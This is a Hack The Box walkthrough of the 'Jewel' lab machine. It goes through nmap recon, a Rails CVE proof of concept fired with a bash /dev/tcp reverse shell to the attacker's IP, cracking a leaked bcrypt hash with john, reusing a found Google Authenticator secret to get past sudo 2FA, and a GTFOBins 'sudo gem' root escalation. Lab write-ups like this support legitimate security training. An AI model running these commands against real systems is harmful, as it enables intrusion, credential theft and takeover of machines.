Jewel ~ Hack The Box

Do not stop enumerating~!

Jewel ~ Hack The Box

Prerequisite

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.10.10.211	jewel.htb" >> /etc/hosts
hosts file entry

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

 nmap -Pn -sC -sV -A -p- -oN initial jewel.htb
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!

Scanning & Enumeration

Based on the scan that was run, I realized that port 8000 was running a web server. This was the web app that was being served!

Enumerating further revealed the app that was running and its version.

  • Rails = V 5.2.2.1

I was able to find an existing CVE for this version of rails and a POC.

Exploitation

With the help of the POC, I was able to gain a minimal shell on the remote box that was running rails 5.2.2.1.

First I had to create an account on the blog which was running on port 8080

Once I had that account created, I was ready to run the exploit.

β”Œβ”€β”€(rootπŸ’€kali)-[/home/…/boxes/htb/machines/jewel]
└─# python3 exploit.py 10.10.10.211 8080 [email protected] nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"
User.txt flag

I was able to gain a stable shell to the user account.

Privilege Escalation

For this, I utilized Linpeas as I always do! The privesc script returned a password hash belonging to bill.

[+] Searching specific hashes inside files - less false positives (limit 70)
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

I headed off to crack the password with my trusty dictionary from seclists and good ol' john!

β”Œβ”€β”€(rootπŸ’€kali)-[/home/…/boxes/htb/machines/jewel]
└─# john password.hash -w=passwd.dict 

Followed by that, I tried to run sudo -l to see what binaries.

However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a .google_authenticator file in the home directory of bill.

[email protected]:~$ cat .google_authenticator 
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH

I then activated the authenticator on my phone and was able to get it working!~

And finally, I was able to run sudo -l using bill's account without any issues.

Now that I knew bill could run gem with sudo privileges, all there was left to do was head to GTFObins and get root!

sudo gem open -e "/bin/sh -c /bin/sh" rdoc

rooty!